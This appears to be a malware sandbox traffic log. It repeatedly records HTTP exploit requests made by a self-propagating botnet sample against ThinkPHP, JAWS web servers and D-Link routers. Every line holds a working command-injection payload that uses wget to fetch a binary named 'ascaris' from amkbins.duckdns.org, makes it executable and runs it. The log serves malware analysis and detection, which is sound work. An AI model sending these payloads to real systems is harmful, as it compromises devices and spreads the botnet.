            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://amkbins.duckdns.org/bins/ascaris.mips%20-O%20->%20/tmp/ascaris;chmod%20777%20/tmp/ascaris;/tmp/ascaris%20dlink.selfrep%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: tbox/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://amkbins.duckdns.org/bins/ascaris.x86 -O /tmp/.ascaris; chmod 777 /tmp/.ascaris; /tmp/.ascaris thinkphp.selfrep' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm jaws.selfrep;rm+-rf+ascaris.arm HTTP/1.1User-Agent: Hello, MomentumHost: 127.0.0.1:80Content-Length: 430Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveData Raw: Data Ascii:
